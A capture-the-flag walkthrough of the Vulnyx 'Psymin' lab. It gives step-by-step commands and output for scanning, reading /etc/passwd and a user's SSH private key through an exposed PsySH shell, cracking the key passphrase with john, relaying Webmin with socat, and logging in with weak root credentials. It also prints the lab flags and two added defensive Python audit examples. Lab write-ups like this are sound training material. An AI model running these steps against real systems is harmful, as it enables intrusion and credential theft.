Vulnyx-Psymin Walkthrough (WP)
By 城南花已开

Information Gathering

Service Enumeration

Three ports are open.

sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.133 08:00:27:da:4f:f5 (Unknown)
192.168.60.254 00:50:56:fd:82:05 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.994 seconds (128.39 hosts/sec). 4 responded
❯ ip=192.168.60.133
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where scanning meets swagging. 😎

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.133:22
Open 192.168.60.133:80
Open 192.168.60.133:3000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 20:40 CST
Initiating ARP Ping Scan at 20:40
Scanning 192.168.60.133 [1 port]
Completed ARP Ping Scan at 20:40, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:40
Completed Parallel DNS resolution of 1 host. at 20:40, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:40
Scanning 192.168.60.133 [3 ports]
Discovered open port 80/tcp on 192.168.60.133
Discovered open port 3000/tcp on 192.168.60.133
Discovered open port 22/tcp on 192.168.60.133
Completed SYN Stealth Scan at 20:40, 0.05s elapsed (3 total ports)
Nmap scan report for 192.168.60.133
Host is up, received arp-response (0.0017s latency).
Scanned at 2025-01-03 20:40:10 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
3000/tcp open ppp syn-ack ttl 64
MAC Address: 08:00:27:DA:4F:F5 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

I looked at port 80 first; it is just the default nginx welcome page.

❯ curl $ip
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>

Let's run a directory scan to see whether there is any useful information; the medium wordlist turns up nothing.

My guess is that the key lead is most likely on port 3000.

I ran nmap again, this time scanning UDP services,

and found port 10000 open with a Webmin service.

❯ nmap -sU -sV --version-intensity 0 -n -F -T4 192.168.60.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 20:47 CST
Nmap scan report for 192.168.60.133
Host is up (0.00054s latency).
Not shown: 58 open|filtered udp ports (no-response), 41 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
10000/udp open webmin (http on TCP port 10000)
MAC Address: 08:00:27:DA:4F:F5 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.38 seconds

Webmin is a web-based system administration tool that simplifies administration tasks on Unix-like operating systems such as Linux and BSD. Through Webmin you can remotely manage and configure a server from a browser without touching the command line. It gives system administrators a single central interface for most administration tasks: user management, service configuration, disk management, network settings and so on.

The reason UDP port 10000 is open is so that other Webmin servers can discover this one.

PsySH File Read

Port 3000, however, turns out to be a PsySH instance that you can connect to with nc.

Checking the commands in the official documentation shows that echo statements can be executed:

Commands · bobthecow/psysh Wiki

Let's try reading a file:

❯ nc 192.168.60.133 3000
Psy Shell v0.12.4 (PHP 8.2.20 — cli) by Justin Hileman
New version is available at psysh.org/psysh (current: v0.12.4, latest: v0.12.7)
> echo file_get_contents('/etc/passwd')
echo file_get_contents('/etc/passwd')
WARNING: terminal is not fully functional
Press RETURN to continue

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
alfred:x:1000:1000:alfred:/home/alfred:/bin/bash
>

PsySH is an interactive command-line shell written in PHP, similar to Python's python command or Ruby's irb. It lets developers execute PHP code on the fly from the command line, debug scripts, and explore PHP classes and functions.

User Privilege Escalation

There is a user named alfred; let's see whether we can read that user's SSH private key.

>  echo file_get_contents('/home/alfred/.ssh/id_rsa')
echo file_get_contents('/home/alfred/.ssh/id_rsa')
WARNING: terminal is not fully functional
Press RETURN to continue

-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----

Let's try connecting with the key.

The key turns out to be passphrase-protected, and there is no other information, so the only option is to brute-force the passphrase.

Got the passphrase: alfredo

❯ vim id_rsa
❯ ssh alfred@192.168.60.133 -i id_rsa
The authenticity of host '192.168.60.133 (192.168.60.133)' can't be established.
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.133' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
alfred@192.168.60.133: Permission denied (publickey).
❯ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
alfredo (id_rsa)
1g 0:00:05:29 DONE 2/3 (2025-01-03 21:52) 0.003037g/s 43.93p/s 43.93c/s 43.93C/s rosita..0987654321
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
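Whether a key is passphrase-protected, and at what KDF cost, can be read straight from the key header rather than discovered through a failed login. The following Python is an added example, not part of the original writeup: it parses the openssh-key-v1 envelope (ciphername, kdfname, and the bcrypt rounds that john reports above as the iteration count) from a constructed sample key, since the real key is not reproduced here.

```python
import base64
import struct

PEM_HEAD = "-----BEGIN OPENSSH PRIVATE KEY-----"
PEM_TAIL = "-----END OPENSSH PRIVATE KEY-----"
MAGIC = b"openssh-key-v1\x00"

def _read_string(buf, off):
    """Read one SSH string (uint32 big-endian length + bytes) at offset."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def _string(data):
    return struct.pack(">I", len(data)) + data

def inspect_openssh_key(pem):
    """Report cipher, KDF and bcrypt rounds from an OpenSSH private key."""
    body = "".join(l.strip() for l in pem.splitlines()
                   if l.strip() and l.strip() not in (PEM_HEAD, PEM_TAIL))
    raw = base64.b64decode(body)
    if not raw.startswith(MAGIC):
        raise ValueError("not an openssh-key-v1 blob")
    off = len(MAGIC)
    cipher, off = _read_string(raw, off)
    kdf, off = _read_string(raw, off)
    kdfopts, off = _read_string(raw, off)
    info = {"cipher": cipher.decode(), "kdf": kdf.decode(),
            "encrypted": cipher != b"none", "rounds": None}
    if kdf == b"bcrypt":                 # kdfoptions = string salt + uint32 rounds
        _salt, o = _read_string(kdfopts, 0)
        (info["rounds"],) = struct.unpack(">I", kdfopts[o:o + 4])
    return info

def build_sample_key(cipher, kdf, rounds=16):
    """Constructed sample key: only the header fields matter for this check,
    so the public/private sections are placeholders, not real key material."""
    kdfopts = _string(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == "bcrypt" else b""
    blob = (MAGIC + _string(cipher.encode()) + _string(kdf.encode()) + _string(kdfopts)
            + struct.pack(">I", 1) + _string(b"pubkey-placeholder")
            + _string(b"private-section-placeholder"))
    b64 = base64.b64encode(blob).decode()
    return "\n".join([PEM_HEAD, *(b64[i:i + 70] for i in range(0, len(b64), 70)), PEM_TAIL]) + "\n"

if __name__ == "__main__":
    print(inspect_openssh_key(build_sample_key("aes256-ctr", "bcrypt", 16)))
    print(inspect_openssh_key(build_sample_key("none", "none")))
```

A cipher of none means the key is stored unencrypted; such keys should be re-encrypted with ssh-keygen -p, and a readable key file is only as strong as its passphrase and KDF rounds.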

Log in and take a look; this gives us the user flag.

❯ ssh alfred@192.168.60.133 -i id_rsa
Enter passphrase for key 'id_rsa':
alfred@psymin:~$ ls
psysh user.txt
alfred@psymin:~$ cat user.txt
e12853c615d191efce15c726a0684754

Port Forwarding

Another round of information gathering.

Port 10000 is only exposed on UDP; its TCP side is not reachable from outside.

Conveniently, the target ships with socat, so forward the port.

alfred@psymin:~$ socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:10000 &
[1] 1850
alfred@psymin:~$ ss -lnutp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:10000 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:10000 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 5 0.0.0.0:3000 0.0.0.0:* users:(("socat",pid=322,fd=5))
tcp LISTEN 0 5 0.0.0.0:8080 0.0.0.0:* users:(("socat",pid=1850,fd=5))
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 [::]:80 [::]:*
alfred@psymin:~$ 2025/01/03 15:02:36 socat[1904] E write(6, 0x556f5bdc4000, 8192): Broken pipe
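The ss listing above is exactly what a host audit should be reading: PsySH on 0.0.0.0:3000 and the new relay on 8080 are both socat processes, while Webmin's TCP listener is loopback-only. The Python below is an added example, not from the original writeup; it parses ss -lnutp output (a constructed sample modelled on the listing above) and flags wildcard-bound listeners outside an expected port set, plus any listener owned by a relay tool.

```python
import re

# Constructed sample in `ss -lnutp` format, modelled on the listing above.
SAMPLE_SS = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp   UNCONN 0      0      0.0.0.0:10000     0.0.0.0:*
udp   UNCONN 0      0      0.0.0.0:68        0.0.0.0:*
tcp   LISTEN 0      4096   127.0.0.1:10000   0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:22        0.0.0.0:*
tcp   LISTEN 0      511    0.0.0.0:80        0.0.0.0:*
tcp   LISTEN 0      5      0.0.0.0:3000      0.0.0.0:* users:(("socat",pid=322,fd=5))
tcp   LISTEN 0      5      0.0.0.0:8080      0.0.0.0:* users:(("socat",pid=1850,fd=5))
tcp   LISTEN 0      128    [::]:22           [::]:*
"""

LOOPBACK = {"127.0.0.1", "[::1]"}
RELAY_TOOLS = {"socat", "nc", "ncat"}   # tools commonly used to relay a local-only service

def parse_ss(text):
    """Parse `ss -lnutp` lines into dicts (proto, addr, port, proc, pid)."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header line
        f = line.split()
        if len(f) < 5:
            continue
        addr, port = f[4].rsplit(":", 1)        # "[::]:22" -> "[::]", "22"
        m = re.search(r'\(\("([^"]+)",pid=(\d+)', line)
        rows.append({"proto": f[0], "addr": addr, "port": int(port),
                     "proc": m.group(1) if m else None,
                     "pid": int(m.group(2)) if m else None})
    return rows

def audit(rows, expected=frozenset({22, 80})):
    """Return (proto, port, reason) for listeners reachable from other hosts
    that are either owned by a relay tool or not in the expected port set."""
    findings = []
    for r in rows:
        if r["addr"] in LOOPBACK:
            continue                            # local-only, not exposed
        if r["proc"] in RELAY_TOOLS:
            findings.append((r["proto"], r["port"],
                             f"relay process {r['proc']} (pid {r['pid']})"))
        elif r["port"] not in expected:
            findings.append((r["proto"], r["port"], "unexpected wildcard listener"))
    return findings

if __name__ == "__main__":
    for proto, port, reason in audit(parse_ss(SAMPLE_SS), expected={22, 80, 68}):
        print(f"{proto}/{port}: {reason}")
```

On a real host, feed it the live output of ss -lnutp (run as root so the Process column is populated) and compare against the ports the host is actually meant to serve.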

Root Privilege Escalation

Log in with weak credentials: both the username and the password are root.

Then just read the flag: 8968662c86171f7a5afe387a949fe665

If you want to go further, you can use the Command Shell module to pop a shell.
